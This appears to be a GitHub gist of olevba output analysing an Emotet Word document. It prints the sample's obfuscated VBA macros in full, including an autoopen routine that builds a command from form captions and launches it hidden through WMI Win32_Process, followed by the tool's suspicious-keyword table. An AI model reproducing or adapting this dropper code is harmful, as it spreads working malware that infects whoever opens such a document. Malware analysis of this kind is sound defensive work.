Skip to content

Instantly share code, notes, and snippets.

@irshadqemu

irshadqemu/emotet.vbs

Created November 15, 2020 20:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save irshadqemu/92354f94b55780c2db56fa6696ec07db to your computer and use it in GitHub Desktop.
Save irshadqemu/92354f94b55780c2db56fa6696ec07db to your computer and use it in GitHub Desktop.
Download ZIP
Raw
emotet.vbs
olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools
===============================================================================
FILE: emotet.doc
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO S9zlQCC.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/S9zlQCC'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO EELFLr.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/EELFLr'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO TrS1jk.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/TrS1jk'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO BdOW1qt.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/BdOW1qt'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Uq3XXQaF.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/Uq3XXQaF'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO EIBYN39s.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/EIBYN39s'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO V9sPZLU.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/V9sPZLU'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO pGv5GKCO.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/pGv5GKCO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function vzVjQz()
On _
Error Resume Next
G9zncq = (YVZLjB85 + Rnd(86) + (4222 + Cos(8992 * Rnd(UJ4Vqfvr) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(104 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
fd61pMMd = 512 * ChrW(zTDlnFW) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (TlEu4dn + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set OU4wzDU_ = bWzdfi7
GS0LWK = zqzYlm3 + ThisDocument.McQHX3.Caption + ThisDocument.PWo3kW.Caption + ThisDocument.psYO9m.Caption + UR1S3b
On _
Error Resume Next
E8XQw6 = (bE0j9Ui5 + Rnd(338) + (4222 + Cos(8992 * Rnd(GLiWOi_) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(731 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
sJUOza = 512 * ChrW(nw28atwu) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (wdFzjT + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set vhuszR6 = rN2MG_
On _
Error Resume Next
aC9tGX = (uUBMaP + Rnd(655) + (4222 + Cos(8992 * Rnd(fHOdUi) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(895 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
nUnKR8o = 512 * ChrW(YMtfHC) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (FoWIAw + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set c8_cpwB = zwuF49r
RcTkkOqw = CreateObject(Replace("w i nm gmts:Win 32 _Pr oc ess", " ", "")).Create(GS0LWK + IEHlwRq, W8KjQY, u0rrBWd, l78zbRfV)
On _
Error Resume Next
jTzFBB = (movZQtjv + Rnd(334) + (4222 + Cos(8992 * Rnd(EAMc9D) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(664 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
Ctpu4ftY = 512 * ChrW(EkbiAj) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (XVBccQd + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set s9NVwH = WR_wPr3Y
End Function
-------------------------------------------------------------------------------
VBA MACRO zacGkX9.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/zacGkX9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
On _
Error Resume Next
wuhj5u = (QWhXZiV + Rnd(986) + (4222 + Cos(8992 * Rnd(kf8CcM) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(892 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
Qa9atL = 512 * ChrW(VlHilWoa) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (MEz37an4 + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set IFjhja = wJlK3r
vzVjQz
On _
Error Resume Next
XjhCsH5t = (XVDjpH3 + Rnd(280) + (4222 + Cos(8992 * Rnd(BaBpfF) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(444 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
hw8NNlz = 512 * ChrW(qlk6q2_) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (CTLvSTn + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set Za6C90f = KWPvOvJS
End Sub
Function u0rrBWd()
On _
Error Resume Next
w0tVAR = (UvwY_w2 + Rnd(842) + (4222 + Cos(8992 * Rnd(REjNZU) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(927 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
DEdXV9 = 512 * ChrW(H49MOD) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (zYE0jXuq + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set T2IBjoKJ = CPCwcG
Set u0rrBWd = CreateObject(z6zhmi + ThisDocument.hjL90Njk.Caption + "Startup" + YfUK5MYA)
On _
Error Resume Next
dlcvKIwk = (CRKhA_jf + Rnd(192) + (4222 + Cos(8992 * Rnd(T26ck3A) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(11 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
rDhczOL0 = 512 * ChrW(krL1ZhNF) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (q7tYSW + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set AKSIPq18 = STzBUj60
u0rrBWd. _
ShowWindow! _
= idm89H + t_4HtlR2 + GcQ0OP + E9KJrnE + riC9rvum + Swt5C6J5
On _
Error Resume Next
Bq4RTMp1 = (R5QGHj5F + Rnd(894) + (4222 + Cos(8992 * Rnd(l2NHvVM) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(262 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
YsHK1izD = 512 * ChrW(Vt1lB0J) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (L_w6MRPL + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set b0_jB1EO = jUdkfc5
On _
Error Resume Next
JvKCRbY = (MYDp39w + Rnd(829) + (4222 + Cos(8992 * Rnd(drcmu54) / 83 + Log(9130)) * 2 + 85))
For Each iArs14 In DMkD685A
For Each BVrY355a In WtgzQ71y4
LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(816 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
Next
Do
btqQZCP = 512 * ChrW(Xi8u3HTl) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (b67OEj8i + CByte(693))
Loop Until fYSpVZg Eqv oWbX
Next
Set AQK7_3d = zAZIDWEn
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |autoopen |Runs when the Word document is opened |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|ShowWindow |May hide the application |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|ChrB |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|ChrW |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|VBA Stomping |VBA Stomping was detected: the VBA source |
| | |code and P-code are different, this may have |
| | |been used to hide malicious code |
+----------+--------------------+---------------------------------------------+
VBA Stomping detection is experimental: please report any false positive/negative at https://github.com/decalage2/oletools/issues
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment